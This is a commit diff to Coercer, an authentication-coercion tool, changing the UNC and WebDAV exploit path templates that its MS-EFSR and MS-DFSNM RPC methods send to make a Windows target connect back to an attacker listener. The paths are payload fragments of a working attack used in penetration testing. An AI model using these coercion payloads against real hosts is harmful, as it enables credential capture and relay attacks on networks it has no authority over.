Fixed #42, Coercing HTTP Authentications did not work properly

p0dalirius · Oct 4, 2023 · 83a1fd7 · 83a1fd7
1 parent b0cefa9
commit 83a1fd7
Show file tree

Hide file tree

Showing 12 changed files with 15 additions and 14 deletions.
diff --git a/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsAddStdRoot.py
@@ -43,7 +43,7 @@ class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py b/coercer/methods/MS_DFSNM/NetrDfsRemoveStdRoot.py
@@ -42,7 +42,7 @@ class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFile.py
@@ -59,7 +59,7 @@ class EfsRpcAddUsersToFile(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py b/coercer/methods/MS_EFSR/EfsRpcAddUsersToFileEx.py
@@ -63,9 +63,10 @@ class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
     """
 
     exploit_paths = [
-        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
-        ("smb", '\\\\{{listener}}\\Share\\\x00'),
-        ("smb", '\\\\{{listener}}\\Share\x00'),
+        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
+        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
+        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcDecryptFileSrv.py
@@ -41,7 +41,7 @@ class EfsRpcDecryptFileSrv(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py b/coercer/methods/MS_EFSR/EfsRpcDuplicateEncryptionInfoFile.py
@@ -52,7 +52,7 @@ class EfsRpcDuplicateEncryptionInfoFile(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py b/coercer/methods/MS_EFSR/EfsRpcEncryptFileSrv.py
@@ -40,7 +40,7 @@ class EfsRpcEncryptFileSrv(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py b/coercer/methods/MS_EFSR/EfsRpcFileKeyInfo.py
@@ -41,7 +41,7 @@ class EfsRpcFileKeyInfo(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py b/coercer/methods/MS_EFSR/EfsRpcOpenFileRaw.py
@@ -41,7 +41,7 @@ class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py b/coercer/methods/MS_EFSR/EfsRpcQueryRecoveryAgents.py
@@ -40,7 +40,7 @@ class EfsRpcQueryRecoveryAgents(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py b/coercer/methods/MS_EFSR/EfsRpcQueryUsersOnFile.py
@@ -40,7 +40,7 @@ class EfsRpcQueryUsersOnFile(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {

diff --git a/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py b/coercer/methods/MS_EFSR/EfsRpcRemoveUsersFromFile.py
@@ -61,7 +61,7 @@ class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL):
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
         ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
-        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
+        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\share\\file.txt\x00'),
     ]
 
     access = {